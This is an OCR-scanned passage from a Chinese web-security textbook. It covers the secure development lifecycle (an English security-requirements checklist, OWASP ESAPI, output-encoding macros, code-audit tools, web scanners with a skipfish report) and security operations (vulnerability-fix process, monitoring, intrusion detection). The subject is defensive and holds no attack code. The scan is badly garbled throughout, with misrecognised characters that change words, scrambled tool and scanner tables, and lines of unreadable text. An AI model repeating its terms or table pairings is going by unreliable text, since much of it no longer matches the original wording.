#1: BUSINESS REQUIREMENTS 

Business Model 


What is the application's primary businesspurpose? 

How will the application make money? 

What are the planned business milestones fordeveloping or improving the 
application? 

How is the application marketed? 

What key benefits does the application offerusers? 

What business continuity provisions havebeen defined for the application? 
What geographic areas does the applicationservice? 

Data Essentials 

What data does the application receive, pro-duce, and process? 

How can the data be classified into categoriesaccording to its sensitivity? 


How might an attacker benefit from captur-ing or modifying the data? 
What data backup and retention require-ments have been defined for the 
application? 

End-Users 

Who are the application's end-users? 

How do the end-users interact with the ap-plication? 

What security expectations do the end-usershave? 

Partners 

Which third-parties supply data to the ap-plication? 

Which third-parties receive data from theapplications? 

Which third-parties process the applica-tion's data? 


What mechanisms are used to share data withthird-parties besides the 
application itself? 


What security requirements do the partnersimpose? 
Administrators 

Who has administrative capabilities in the ap-plication? 
What administrative capabilities does the ap-plication offer? 
Regulations 

In what industries does the application oper-ate? 

What security-related regulations apply? 

What auditing and compliance regulationsapply? 

#2: INNASTRUCTURE REQUIREMENTS 

Network 


What details regarding routing, switching,firewalling, and load-balancing 
have been de-fined? 


What network design supports the applica-tion? 

What core network devices support the appli-cation? 

What network performance requirements ex-ist? 

What private and public network links sup-port the application? 
Systems 

What operating systems support the applica-tion? 


What hardware requirements have been de-fined? 


What details regarding required OS compo-nents and lock-down needs have 
been defined? 


Infrastructure Monitoring 


What network and system performance mon-itoring requirements have been 
defined? 


What mechanisms exist to detect maliciouscode or compromised 
application components? 


What network and system security monitor-ing requirements have been 
defined? 


Virtualization and Externalization 
What aspects of the application lend them-selves to virtualization? 
What virtualization requirements have beendefined for the application? 


What aspects of the product may or may notbe hosted via the cloud 
computing model? 


#3: APPLICATION REQUIREMENTS 
Environment 


What frameworks and programming lan-guages have been used to create 
the application? 


What process, code, or infrastructure depen-dencies have been defined for 
the application? 


What databases and application servers sup-port the application? 
Data Processing 

What data entry paths does the applicationsupport? 

What data output paths does the applicationsupport? 

How does data flow across the application'sinternal components? 
What data input validation requirementshave been defined? 
What data does the application store andhow? 


What data is or may need to be encrypted andwhat key management 
requirements have beendefined? 


What capabilities exist to detect the leakage ofsensitive data? 


What encryption requirements have been de-fined for data in transit over 
WAN and LAN links? 


Access 

What user identification and authenticationrequirements have been defined? 
What session management requirementshave been defined? 

What access requirements have been definedfor URI and Service calls? 
What user authorization requirements havebeen defined? 

How are user identities maintained through-out transaction calls? 

What user access restrictions have been de-fined? 

What user privilege levels does the applica-tion support? 

Application Monitoring 


What application performance monitoring re-quirements have been 
defined? 


What application security monitoring re-quirements have been defined? 


What application error handling and loggingrequirements have been 
defined? 


How are audit and debug logs accessed,stored, and secured? 
What application auditing requirements havebeen defined? 
Application Design 

How many logical tiers group the applica-tion's components? 


How is intermediate or in process data storedin the application components' 
memory and incache? 


What application design review practiceshave been defined and executed? 


What staging, testing, and Quality Assurancerequirements have been 
defined? 


#4: SECURITY PROGRAM REQUIRE-MENTS 
Operations 


What access to system and network adminis-trators have to the application's 
sensitive data? 


What security incident requirements havebeen defined? 


What physical controls restrict access to theapplication's components and 
data? 


What is the process for granting access to theenvironment hosting the 
application? 

What is the process for identifying and ad-dressing vulnerabilities in 
network and systemcomponents? 

How do administrators access production in-frastructure to manage it? 
What is the process for identifying and ad-dressing vulnerabilities in the 
application? 

Change Management 


What mechanisms exist to detect violations ofchange management 
practices? 


How are changes to the infrastructure con-trolled? 

How are changes to the code controlled? 

How is code deployed to production? 

Software Development 

How do developers assist with troubleshoot-ing and debugging the 
application? 

What requirements have been defined forcontrolling access to the 
applications source code? 

What data is available to developers for test-ing? 

What secure coding processes have been es-tablished? 

Corporate 

Which personnel oversees security processesand requirements related to the 
application? 

What employee initiation and terminationprocedures have been defined? 


What controls exist to protect a compromisedin the corporate environment 
from affecting pro-duction? 


What security governance requirements havebeen defined? 
What security training do developers and ad-ministrators undergo? 


What application requirements impose theneed to enforce the principle of 
separation of du-ties? 


What corporate security program require-ments have been defined? 


此 外 ， 在 项 目 需求 分 析 或 设计 阶段 ， 应 该 了 解 项 目 中 是 否 包含 了 一 些 
第 三 方 软件 。 如 条 有 ， 则 需要 认真 评估 这 些 第 三 方 软件 是 否 会 存在 安 
全 问题 。 很 多 时 候 ， 入 侵 是 从 第 三 方 软件 开始 的 。 如 果 评 估 后 发 现 第 
三 方 软件 存在 风险 ， 则 应 该 殖 换 它 ， 或 者 使 用 其 他 方式 来 规避 这 种 风 
在 需求 分 析 与 设计 阶段 ， 因 为 业务 的 多 样 性 ， 一 份 checklist 并 不 一 定 
能 履 关 到 所 有 情况 。check-list 并 非 万 能 的 ， 在 实际 使 用 时 ， 更 多 的 要 
依靠 安全 工程 师 的 经 验 做 出 判断 。 

一 个 最 佳 实践 是 给 公司 拥有 的 数据 定 级 ， 对 不 同 级 别 的 数据 定义 不 同 
的 保护 方式 ， 将 安全 方案 模块 化 。 这 样 在 review 项 目的 需求 和 设计 
根据 项 目 涉 及 的 数据 敏感 程度 ， 可 以 套用 不 同 的 等 级 化 保护 标 
I o 


175 ”开发 阶段 

开发 阶段 是 安全 工作 的 一 个 重点 。 依 据 “ 安 全 是 为 业务 服务 ”这 一 指导 
思想 ， 在 需求 层面 ， 安 全 改变 业务 的 地 方 较 少 ， 因 此 应 当 力 求 代 码 实 
现 上 的 安全 ， 也 就 是 做 到 “安全 的 功能 ”。 

要 达到 这 个 目标 ， 首 先 要 分 析 可 能 出 现 的 漏洞 ， 并 从 代码 上 提供 可 行 
的 解决 方案 。 在 本 书 中 ， 深 入 探讨 了 各 种 不 同 漏洞 的 原理 和 修补 方 
法 。 根 据 这 些 经 验 ， 可 以 设计 一 套 适 用 于 企业 自身 开发 环境 的 安全 方 
17.5.1 “提供 安全 的 函数 

OWASP 的 开源 项 目 OWASP ESAPI 也 为 安全 模块 的 实现 提供 了 参考 。 如 
果 开 发 者 没有 把 握 实 现 一 个 足够 好 的 安全 模块 ， 则 最 好 是 参考 
OWASPESAPI 的 实现 方式 。 

ESAPI 目前 有 针对 多 种 不 同 Web 语 言 的 版 本 ， 其 中 又 以 Java 版 本 最 为 完 


Category:OWASP Enterprise Security API 


ES Downloads | Here's what I did with ESAPI | Glossary | Java EE | NET | Classic ASP | PHP | ColdFusion /CFML | Python JavaScript | 
| Objective C | Force.com | Ruby | Swingset | ESAPIC | ESAPI C++ | Project Details 


OWASP ESAPI 支 持 的 语言 
下 面 为 Java 版 本 ESAPI 的 Packages 列 表 ， 从 中 可 以 了 解 ESAPI 实 现 的 功 
HE 。 


ESAPI 2.0.1 API 


> The ESAPI interfaces and Exception classes model the most important 
org.owasp.esapi . . f , 
security functions to enterprise web applications. 


This package contains codecs for application layer encoding/escaping 
org.owasp.esapi.codecs 
schemes that can be used for both canonicalization and output encoding. 
This package contains ESAPI cryptography-related classes used 


throughout ESAPI. 
A set of exception classes designed to model the error conditions that 


org.owasp.esapi.crypto 


Org.owasp.esapi.errors "n ! we ， 
frequently arise in enterprise web applications and web services. 


b This package contains several filters that demonstrate ways of using the 
org.owasp.esapi.filters 
ESAPI security controls in front of your application. 
This package contains reference implementations of the ESAPI 


org.owasp.esapi.reference 
interfaces. 


This package contains the reference implementation for some of the 
ESAPI cryptography-related classes used throughout ESAPI. 


org.owasp.esapi.reference.validation This package contains data format-specific validation rule functions. 


This package contains sample JSP tags that demonstrate how to use the 


org.owasp.esapi.reference.crypto 


org.owasp.esapi.tags 
ESAPI functions to protect an application from within a JSP page. 


This package contains ESAPI utility classes used throughout the 


org.owasp.esapi.util 
reference implementation of ESAPI but may also be directly useful. 


org.owasp.esapi.waf This package contains the ESAPI Web Application Firewall (WAF). 


: This package contains the Action objects that are executed after a Rule 
org.owasp.esapi.waf actions 
subclass executes, 


This package contains the both the configuration object model and the 
org.owasp.esapi. waf.configuration 
utility class to create that object model from an existing policy file. 


This package contains all HTTP-related classes used internally by the 
org.owasp.esapi.waf internal 
WAF for the implementation of its rules. 


This package contains all of the Rule subclasses that correspond to 
org.owasp.esapi.waf rules 
policy file entries. 


在 “Web 框 架 安 全 ”一 章 中 谈 到 ， 很 多 安全 功能 放 到 开发 框架 中 实现 ， 会 
大 大 降低 程序 员 的 开发 工作 量 。 这 是 一 种 值得 推广 的 经 验 。 

在 开发 阶段 ， 还 可 以 使 用 的 一 个 最 佳 实践 就 是 制定 出 开发 者 的 开发 规 
范 ， 并 将 安全 技术 方案 写 进 开 发 规范 中 ， 让 开发 者 牢记 开发 规范 。 
比如 在 “Web 框架 安 全 ”一 章 中 曾 提 到 ， 在 对 抗 XSS 攻 击 时 ， 需 要 编码 所 
有 的 变量 再 进行 泻 染 输出 。 为 此 我 们 在 模板 中 实现 了 安全 宏 : 

XML 编码 输出 ， 将 会 执行 XML Encode 输 出 


#SXML($xm1) 


JS 编码 输出 ， 将 会 执行 JavaScript Encode 输 出 


#SIS($js) 


文 比如 微软 在 面 对 同 样 问题 时 ， 为 开发 者 提供 了 安全 男 数 库 : 


Encoder Methods P 
tedeces seis memes, Microsoft.Security.Application.Encoder 
The Encoder type exposes the following members. 
- Methods 
Name Description 
"s CasEncode Encodes input strings used in Cascading Style Sheet (CSS) elements. 
"s Btmláttnibute£ncode Encodes input strings for use in HTML attributes 
"s HtmiEncode Overloaded. 
"s lavagenetincode Overloaded. 
"s bdaaknaoge Encodes input strings used in Lightweight Directory Access Protocol (LOAP) search queries. 
"s UrlEncode Overloaded, 
Ss VigualBesicScriptEncode Encodes input strings for use in Visual Basic Script. 
"s Last Encodes input strings for use in XML attributes, 
"s XmlEncode Encodes input strings for use in XML. 


微软 提供 的 安全 了 画 数 

这 些 写法 需要 开发 者 牢记 ， 因 此 需要 将 其 写 入 开发 规范 中 。 在 代码 审 
核 阶 段 ， 可 以 通过 白 盒 扫描 的 方式 检查 变量 输出 是 否 使 用 了 安全 的 画 
数 ， 没 有 使 用 安全 函数 的 可 以 认为 不 符合 安全 规范 。 这 个 过 程 也 可 以 
由 开发 者 自 检 e 

这 种 申明 是 非常 有 必要 的 。 因 为 如 果 开 发 者 按照 自己 的 喜好 来 写 ， 比 
如 自 定义 一 个 输出 HTML 页 面 的 过 程 ， 而 这 个 过 程 的 实现 可 能 是 不 安全 
的 。 安 全 工程 师 若 要 审计 这 样 的 代码 ， 则 需要 通读 所 有 的 代码 逻辑 ， 
将 耗费 巨大 的 时 间 和 精力 。 

将 安全 方案 写 入 开发 规范 中 ， 就 真正 地 让 安全 方案 落 了 地 。 这 样 不 仅 
a a 
175.2 ”代码 安全 审计 工具 


常见 的 一 些 代码 审计 工具 ， 在 面 对 复 杂项 目 时 往往 会 束手无策 。 这 一 
般 是 由 两 个 原因 造成 的 一 一 

首先 ， 男 数 的 调用 坪 一 个 复杂 的 过 程 ， 甚 至 音 有 一 个 函数 调用 另外 一 
个 文件 中 画 数 的 情况 出 现 。 当 代码 审计 工具 找到 敏感 函数 如 evalO 时 ， 
回溯 函数 的 调用 路 径 时 往往 会 遇 到 困难 。 

其 次 ， 如 果 程 序 使 用 了 复杂 的 框架 ， 则 代码 审计 工具 往往 也 缺乏 对 杠 
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口 ， 然 后 跟踪 变量 的 传递 情况 ， 看 变量 最 后 是 否 会 走 到 危险 函数 (如 
eval()) 。 这 种 思路 比 回溯 函数 调用 过 程 要 容易 实现 ， 但 仍然 会 存在 较 
多 的 误 报 。 

目前 还 没有 比较 完美 的 目 动 化 代码 审计 工具 ， 代 码 审计 工具 的 结果 仍 
然 需要 人 工 处 理 。 下 表 列 出 了 一 些 常见 的 代码 审计 工具 。 


Name Type Description 
ic 


CodeSonar 
CodeSpy 


CovertyPrevent 


DevPartner 
SecurityChecker 
flawfinder 
Fortify 


Tools 


PrexisEngine 


Pscan 
RATS 


smatch 


commercial 
open source 
commercial 


academic 


commercial 


open source 


commercial 


commercial 
freeware 

academic 

commercial 
open source 
open source 
open source 


open source 


Checks for vulnerabilities and other defects in C and CH. 
Security scanner for Java. 
C/C+ bug checker and security scanner, 


C Data-flow analyzer using type/taint analysis. Requires some program annotations. 
Security scanner for C# and Visual Basic 

Security scanner for C code, 

General-purpose security scanner for C, C++, and Java. 


Checks for vulnerabilities and other defects in C, C++, and Java. 

Checks for potentially dangerous function calls in C code. 

Checks for vulnerabilities involving sequences of function calls in C code. 
Security scanner for C/C++ and Java/JSP. 

Checks for potentially dangerous function calls in C code, 

Checks for potentially dangerous function calls in C code. 

C/C+ bug checker and security scanner. 


Checks C code for potential vulnerabilities and other dangerous programming practices. 


代码 的 自动 化 审计 比较 困难 ， 而 半自动 的 代码 审计 仍然 需要 耗费 大 量 
的 人 力 ， 那 有 没有 取 巧 的 办 法 呢 ? 
实际 上 ， 对 于 甲 方 公司 来 说 ， 完 全 可 以 根据 开发 规范 来 定制 代码 审计 


LR RED. 


H 
思想 是 


， 并 非 直 接 检 查 代 码 是 否 安 全 ， 而 是 检查 开发 着 


征 否 遵守 了 开发 规范 。 

这 样 束 把 复杂 的 “代码 目 动 化 审计 ”这 一 难题 ， 转 化 为 "代码 是 否 符合 
发 规范 ”的 问题 。 而 开发 规范 在 编写 时 束 可 以 写成 易于 审计 的 一 种 规 
范 。 最 终 ， 如 果 开 发 规范 中 的 安全 方案 没有 问题 的 话 ， 当 开发 者 严格 
遵守 开发 规范 时 ， 产 出 的 代码 就 应 该 是 安全 的 。 

MEI 以 Web 开 发 为 主 的 互联 网 公司 来 说 ， 具 有 高 度 的 可 操作 


17.6 ”测试 阶段 

测试 阶段 是 产品 发 布 前 的 最 后 一 个 阶段 ， 在 此 阶段 需要 对 产品 进行 充 
分 的 安全 测试 ， 验 证 需求 分 析 、 设 计 阶段 的 安全 功能 是 否 符合 预期 目 
标 ， 并 验证 在 开发 阶段 发 现 的 所 有 安全 问题 是 否 得 到 解决 。 

安全 测试 应 该 独立 于 代码 审计 而 存在 。“ 安 全 测试 "相对 于 “代码 审计 ”而 
言 ， 至 少 有 两 个 好 处 : 一 是 有 一 些 代码 逻辑 较为 复杂 ， 通 过 代码 审计 
难以 发 现 所 有 问题 ， 而 通过 安全 测试 可 以 将 问题 看 得 更 清楚 ; 二 是 

一 些 逻 辑 漏洞 通过 安全 测试 ， 可 以 更 快 地 得 到 结果 。 

安全 测试 ， 一 般 分 为 自动 化 测试 和 手动 测试 两 种 方式 。 

自动 化 测试 以 覆盖 性 的 测试 为 目的 ， 可 以 通过 “Web 安 全 扫描 右 ” 对 项 目 
或 产品 进行 漏洞 扫描 。 

H Bj Web Zt & fJ fii ae EF XJ “XSS” ^ "SQL In-jection”、“Open 
Redirect" ^ “PHP File Include” 等 漏洞 的 检测 技术 已 经 比较 成 熟 。 这 十 因 
为 这 些 漏洞 的 检测 方法 主要 是 检测 返回 结果 的 字符 串 特 征 。 

而 对 于 “CSRF”、“ 越 权 访问 *”、“ 文 件 上 传 ”等 漏洞 ， 却 难以 达到 目 动 化 
仿 测 的 效果 。 这 是 因为 这 些 漏洞 涉及 系统 逻辑 或 业务 逻辑 ， 有 时候 还 
需要 人 机 交互 参与 页 面 流 程 。 因 此 这 类 漏洞 的 检测 更 多 的 需要 依靠 手 
动 测试 完成 。 

Web 应 用 的 安全 测试 工具 一 般 是 使 用 Web 安 全 扫描 器 。 传 统 的 软件 安全 
测试 中 常用 到 的 fuzzing 测 试 模糊 测试 ) ， 在 Web 安 全 测试 领域 比较 少 
见 。 从 某 种 程度 上 来 说 ，Web 扫 描 也 可 以 看 做 是 一 种 fuzzing。 

优秀 的 web 安全 扫描 器 ， 商 业 软 件 的 代表 有 “”“IBM Rational 
Appscan”、“WebInspect”、“Acunetix WVS” 等 ; Ef RAH P, E 
不 乏 精 品 ， 比 如 “w3af”`“skipfish” 等 。 扫 描 器 的 性 能 、 误 报 率 、 漏 报 
率 等 指标 是 考核 一 个 扫 摘 句 是 否 优 秀 的 标准 ， 通 过 不 同 扫 接 如 之 间 的 
对 比 测 试 ， 可 以 挑选 出 最 适合 企业 的 扫描 器 。 同 时 ， 也 可 以 参考 下 表 
所 示 的 一 份 公 开 的 评测 报告 ， 以 及 业内 同行 的 使 用 经 验 。 
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OE 

W3AF 

enzic Hailstorm Protessiona 
Nessus 

Aunetix ommercial Edition 
SkipFish 

Sandcat CS 


Dy, 
aL Q 


() der 

Sandcat Free Edition 

T 

Vega 

Netsparker(Commercia Edition 
Burp Suite Professional 

' d 

ZAP 
PowerFuzzer 
ParosPro 

Andiparo 

Watobo 

Security Scanner 
Paros Proxy 
Oedipus 

JSKY Free Edition 
WebSecurify 


ber We 


Web Cruiser Free Edition 
Wi “‘yuiser erpris itið 
Proxys jke 


obr: 
WebScarab 


XSSploit 


Priamos 
openAcunetix 
-Stalker 2012 ditio 


Mini MySg or 


Damn Small SOLi Scanner DSSS 


Jeb Iniectio 1 
SXOID(SQ jection. Digg 
1 1 O 
` d 
-Stalker 2009 Free Editio 
over BO 


e 
a 


skipfish 是 Google 使 用 的 一 款 Web 安 全 扫描 器 ，Google 开 放 了 其 源 代 码 : 
Google 的 Jskipfish 扫 描 结果 页 面 


———————————— ——————— 


Scanner version; 1.78 Scan date; Sun Nov 21.23:40:36 2010 - 
Randomseed: oxscy1g20a Totaltime: ohrgmin8see4o7ms — 


Problems with this scan? Click here for advice. 


Crawl results - click to expand: 


m = http://www.example.com/ 04 96 #67 


as Code: 200, length: 596, declared: text/html, detected: application/xhtml+xml, charset: UTF-8 [ show trace + ] 
© New 404 signature seen 
1, Code: 404, length: 270, declared: text/html, charset: iso885o-1 ( show trace +] 
O New 'Server' header value seen 


1, Code: 200, length: 596, declared: text/html, charset; UTF-8 [ show trace + ] 
Memo: Apache 


` 中 sm y Qi 


Code: 403, length: 272, declared: text/html, detected: application/xhtml+xml, charset: is0-8859-1 [ show trace + ] 


cgi-bin x 


Code: 403, length: 275, declared: text/html, detected: application/xhtml«xml, charset: iso-8859-1 [ show trace + ] 


g ea x 9195 


Code: 403, length: 275, declared: text/html, detected: application/xhtmlexml, charset: i50-8859«: ( show trace + ] 


ur 


SE. 
Code: 403, length: 278, declared: text/html, charset: is0-8859-1 [ show trace + ] 


ij 中 include yy 3 


Code: 403, length: 281, declared: text/html, detected: application/xhtml+xml, charset: iso-8859-1 [ show trace + ] 
中 README ;; Q1 


E Code 200, length: 1979, declared: text/plain, detected: text/plain, charset: UTF- [ show trace +] 


N 中 icons @4 02 657 


Code: 200, length: 30019, declared: text/html, detected: application/xhtmil+xml, charset: 150-8859«1 [ show trace + ] 


index.html 党 


C Code: 200, length: 596, declared: text/html, charset: UTF-8 [ show trace + ] 


Document type overview - click to expand: 


.« application/xhtml+xml (5) 


skipfish 的 性 能 非 第 优秀 ， 由 于 其 开放 了 源 代 码 ， 且 有 Google 的 成 功 案 
例 在 前 ， 因 此 对 于 想 定制 扫描 器 的 安全 团队 来 说 ， 是 一 个 二 次 开发 的 


上 佳 选 择 。 

安全 测试 完成 以 后 ， 需 要 生成 一 份 安全 测试 报告 。 这 份 报告 并 不 是 扫 
描 右 的 扫描 报告 。 扫 描 报告 可 能 会 存在 误 报 与 漏 报 ， 因 此 扫描 报告 需 
要 经 过 安全 工程 师 的 最 终 确认 。 确 认 后 的 扫描 报告 ， 结 合 手动 测试 的 
结果 ， 最 终 形成 一 份 安全 测试 报告 。 

安全 测试 报告 中 提 到 的 问题 ， 需 要 交 给 开发 工程 师 进 行 修复 。 漏 洞 修 
补 完成 后 ， 再 迭代 进行 安全 测试 ， 以 验证 漏洞 的 修补 情况 。 由 此 可 
见 ， 在 项 目 初期 与 项 目 经 理 进行 充分 沟通 ， 预 留 出 代码 审计 、 安 全 测 
试 的 上 时间， 古 一 件 很 重要 的 事情 。 


17.7 小 结 

本 章 讲述 了 如 何在 项 目 开 发 的 过 程 中 实施 SDL (REA ARIE) 。 
SDL 是 建立 在 公司 软件 工程 基础 之 上 的 ， 公 司 的 软件 工程 实施 越 规 
范 ，SDL 就 越 容易 实施 ， 反 之 则 难度 越 大 。 

互联 网 公司 不 同 于 传统 软件 公司 ， 它 更 注重 产品 的 快捷 与 时 效 性 ， 
此 在 产品 开发 的 路 线 上 大 多 选择 敏捷 开发 ， 这 也 给 SDL 的 实施 带 来 了 
一 定 的 难度 。 

SDL 需 要 从 上 往 下 推动 ， 归 根 结 底 ， 它 仍然 是 “人 ”的 问题 。 实 施 SDL 
一 定 要 得 到 公司 技术 负责 人 与 产品 负责 人 的 全 力 支持 ， 并 通过 完善 软 
件 发 布 流程 、 工 程 师 的 工作 手册 来 达到 目的 。SDL 实 施 的 成 功 与 否 ， 
与 来 自 高 级 管理 层 的 支持 力度 有 很 大 关系 。 


第 18 章 ”安全 运营 

俗话 说 ， 安 全 是 “二 分 技术 ， 七 分 管理 *”。 安 全 对 于 企业 来 说 ， 结 果 才 
是 最 重要 的 。 安 全 方案 设计 完成 后 ， 即 使 看 起 来 再 美好 ， 也 需要 经 受 
实践 的 检验 。 在 “我 的 安全 世界 观 ” 一 章 中 曾经 提 到 ， 安 全 是 一 个 持续 
的 过 程 。 而 “安全 运营 ”的 目 的 ， 就 是 把 这 个 “持续 的 过 程 > 执 行 起 来 。 


18.1 ”把 安全 运营 起 来 

ARMA a AACN Ke RAE? 从 战略 层面 上 来 说 ， 
Aberdeen Group 提 到 了 三 句 话 : Find and Fix, Defend and Defer, Secure 
at the Source。 


IT Security Team 


Application Development Team 


"Find and Fix” Application Vulnerability Scanning, Penetration Testing 


Det ade” Web patos 
Secure Software Development Lifecycle at the Source” 


安全 工作 的 框架 图 

一 个 安全 评估 的 过 程 ， 就 是 一 个 “Find andFix” 的 过 程 。 通 过 漏洞 扫描 、 
渗透 测试 、 代 码 审计 等 方式 ， 可 以 发 现 系 统 中 已 知 的 安全 问题 ;然后 
再 通过 设计 安全 方案 ， 实 施 安全 方案 ， 最 终 解 雇 这些 问 题 。 

而 像 入 侵 检 测 系 统 、Web 应 用 防火 墙 , 反 DDOS 设 备 等 则 是 一 些 防 御 性 
的 工作 ， 这 也 是 保证 安全 必 不 可 少 的 一 个 部 分 。 它 们 能 防范 问题 于 未 
然 ， 或 者 当 安 全 事件 发 生 后 ， 快 速 地 啊 应 和 人 处理 问题 。 这 些 防御 性 的 
工作 ， 是 一 个 “Defend and De-fer” 的 过 程 。 

最 后 “Secure at the Source” 指 的 则 是 “安全 开发 流程 (SDL) ”， 它 能 从 源 
头 降 低 安 全 风险 ， 提 高 产品 的 安全 质量 。 

这 二 者 的 关系 是 互补 的 ， 当 SDL 出 现 差 错时 ， 可 以 通过 周期 性 的 扫 
描 、 安 全 评估 等 工作 将 问题 及 时 解决 ， 而 入 侵 检 测 、WAF 等 系统 ， 则 
可 以 在 安全 事件 发 生 后 的 第 一 时 间 进 行 响 应 ， 并 有 助 于 事后 定 损 。 如 
oe 都 可 能 使 得 公司 的 安全 体系 出 现 短 板 ， 出 现 可 乘 之 


安全 运营 贯穿 在 整个 体系 之 中 。 安 全 运 草 需要 让 端口 扫描 、 漏 洞 扫 
fa ^ fh EA Re ACRI Ae 成 一 种 周期 ' 性 的 任务 。 

因为 安全 是 一 个 持续 的 过 程 (在 “我 的 安全 世界 观 ” 一 章 中 已 经 强调 过 
SLE 我 们 永远 无 法 傈 证 在 下 一 刻 网 络 管 理 员 是 否 会 因为 工作 
琉 忽 而 把 SSH 端 口 开放 到 Intemet， 或 者 是 某 个 小 项 目 又 逃 过 了 安全 检 
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兰 建 立 起 来 的 安全 防线 。 假 设 管理 工作 和 流程 是 不 可 靠 的 ， 束 需要 通 
过 安全 运营 不 断 地 去 发 现 问题 ， 周 期 性 地 做 安全 健康 检查 ， 才 能 让 我 
们 放心 。 这 个 工作 ， 则 是 安全 运营 需要 做 的 <Find* 的 工作 。*Fix” 的 工 
作 分 为 两 种 ， 一 种 是 例 行 的 扫描 任务 发 现 了 漏洞 ， 需 要 及 时 修补 ， 男 
一 种 则 是 在 安全 事件 发 生 时 ， 或 者 是 0day 漏 洞 被 公布 时 ， 需 要 进行 紧 
急 响 应 。 这 些 工作 需要 建立 制度 和 流程 ， 并 有 专门 的 人 对 此 负责 。 
SDL 的 工作 也 可 以 看 成 是 安全 运营 的 一 部 分 ， 但 由 于 其 与 软件 工程 结 
合 紧 密 ， 独 立 出 来 也 无 不 可 。 

在 安全 运 早 的 过 程 中 , 必然 会 与 各 种 安全 产品 、 安 全 工具 打交道 。 有 
的 安全 产品 是 商业 产品 Hh, 有 的 则 是 开源 工具 ， 甚 至 安全 团队 还 需要 自 
主人 研发 一 些 安全 工具 ， 这 些 安全 产品 都 会 产生 大 量 的 日 志 ， 这 些 日 志 
对 于 安全 运营 来 说 是 非常 有 价值 的 。 通 过 事件 之 间 的 关联 ， 可 以 全 面 
地 分 析出 企业 的 安全 现状 ， 并 对 未 来 的 安全 趋势 做 出 一 些 预警 ， 为 决 
策 提 供 参考 意见 。 

将 各 种 安全 日 志 、 安 全 事件 关联 起 来 的 系统 我 们 称 之 为 SOC (Security 
Operation Center) 。 建 立 SOC 可 以 算是 安全 运营 的 一 个 重要 目标 。 


18.2 ”漏洞 修补 流程 

建立 漏洞 修补 流程 ， 是 在 “Fix” 阶 段 要 做 的 第 一 件 事 情 。 当 公司 规模 不 
大 时 ， 沟 通 成 本 较 低 ， 可 以 通过 口 口 相传 的 方式 快速 解决 问题 ; 但 当 
公司 规模 大 了 以 后 ， 沟 通 成 本 随 之 上 升 ， 相 应 的 漏洞 修补 速度 会 降 
低 ， 而 只 靠 沟 通 还 可 能 会 出 现 一 些 错漏 ， 所 以 建立 一 个 “漏洞 修补 流 
程 以 保证 漏洞 修补 的 进度 和 质量 是 非常 有 必要 的 。 

最 常见 的 问题 吓 漏洞 报告 给 开发 团队 后 ， 述 人 迟 未 能 得 到 反馈 ， 一 拖 再 
拖 。 这 是 因为 安全 漏洞 对 于 开发 团队 的 现 有 开发 计划 来 说 ， 是 一 种 意 
外 。 但 这 种 问题 不 难 解 决 ， 因 为 开发 团队 一 般 都 会 建立 bug 管 理 的 平 
台 ， 比 如 bugtracker 等 ， 只 需要 将 安全 漏洞 作为 bug 提 区 到 bugtracker 
中 ， 就 会 成 为 开发 团队 的 一 个 例 行 修补 bug 的 工作 ， 会 按照 计划 完成 。 
目前 许多 大 的 开源 项 目 也 是 如 此 处 理 安 全 漏洞 的 ， 在 bug 中 会 定义 类 型 
同 EcL 紧急 程度 。 
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一 个 bugtracker 的 截图 

除 此 之 外 ， 篆 见 的 问题 还 有 漏洞 修补 得 不 彻底 ， 补 丁 发 布 后 ， 被 发 现 
漏洞 仍然 可 以 利用 ， 这 种 情况 时 有 发 生 。 通 党 造成 此 问题 的 原因 是 ， 
补丁 的 实现 方案 与 代码 未 双 至 安 全 部 门 检查 ， 有 时候 也 有 可 能 是 处 理 问 
题 的 安全 工程 师 未 能 理解 漏洞 的 本 质 ， 因 此 导致 修补 方案 存在 缺陷 。 
因此 在 制定 补丁 的 方案 时 ， 首 先 应 该 由 安全 工程 师 对 漏洞 进行 分 析 ， 
然后 再 和 开发 团队 一 起 制定 技术 方案 ， 并 由 安全 工程 师 review 补 丁 的 代 
码 ， 最 后 才能 发 布 上 线 。 

对 于 “安全 运营 ”的 工作 来 说 ， 建 立 漏洞 修补 流程 ， 意 味 着 需要 完成 这 
几 件 事情 : (A) 建立 类 似 bugtracker 的 漏洞 跟踪 机 制 ， 并 为 漏洞 的 紧 


急 程度 选择 优先 级 (B) 建立 漏洞 分 析 机 制 ， 并 与 程序 员 一 起 制定 修 
补 方案 ， 同 时 review 补 丁 的 代码 实现 (C) 对 曾经 出 现 的 漏洞 进行 归 
档 ， 并 定期 统计 漏洞 修补 情况 。 

对 存在 过 的 漏洞 进行 归档 ， 有 是 公司 安全 经 验 的 一 种 积累 。 历 年 来 曾经 
出 现 过 的 漏洞 ， 走 公司 成 长 的 至 贯 财富 。 对 调 洞 数量 、 漏 洞 关 型 、 产 
生 原 因 进 行 统计 ， 也 可 以 从 全 局 的 角度 看 到 系统 的 短 板 在 什么 地 方 ， 
为 决策 提供 依据 。 


183 ”安全 监控 

安全 监控 与 报警 ， 是 “Defend and Defer"Bj— FHA CF Et ° 

对 于 互联 网 公司 来 说 ， 由 于 其 业务 的 高 度 连续 性 ， 所 以 监控 网 络 、 系 
统 、 应 用 的 健康 程度 是 一 件 非常 重要 的 事情 。 监 控 能 使 公司 在 发 生 任 
何 异 稼 时 第 一 时 间 吏 做 出 反应 。 下 图 为 一 个 开源 的 监控 系统 Nagios。 


成 
其 实 网 站 的 安全 性 也 是 需要 监控 的 。 安 全 监控 的 主要 目的 ， 是 探测 网 
站 或 网 站 的 用 户 是 否 被 攻击 ， 是 否 发 生 了 DDOS， 从 而 可 以 做 出 反 
N/ o 

安全 监控 与 安全 扫描 又 是 什么 关系 呢 ? 是 否 有 了 安全 扫描 就 可 以 不 用 
安全 监控 了 呢 ? 

理论 上 说 ， 如 果 一 切 痢 是 完 类 的 ， 所 有 源 润 都 可 以 通过 扫描 器 发 现 的 
话 ， 那 么 可 以 不 需要 安全 监控 。 但 现实 是 扫 接 器 难 以 履 蓄 到 所 有 漏 
洞 ， 有 时候 由 于 扫描 絮 规 则 或 一 些 其 他 的 问题 ， 还 可 能 导致 漏 报 。 
此 安全 监控 是 对 网 站 安全 的 有 力 补 充 。 安 全 监控 谍 像 古 一 双眼 睛 ， 能 
够 时 刻 捕 提 到 发 生 的 异常 情况 。 


18.4 入侵 检测 

常见 的 安全 监控 产品 有 IDS (入 侵 检 测 系 统 ) ^ IPS (入 侵 防 御 系 
Si) 、DDOS 监 控 设 备 等 。 在 IDS 这 个 大 家 族 中 ，Web 应 用 防火 墙 〈 简 
称 WAF) 又 是 近年 来 兴起 的 一 种 产品 。 相 对 于 传统 的 IDS 来 说 ，WAF 专 
注 于 应 用 层 攻 击 的 检测 和 防御 。 

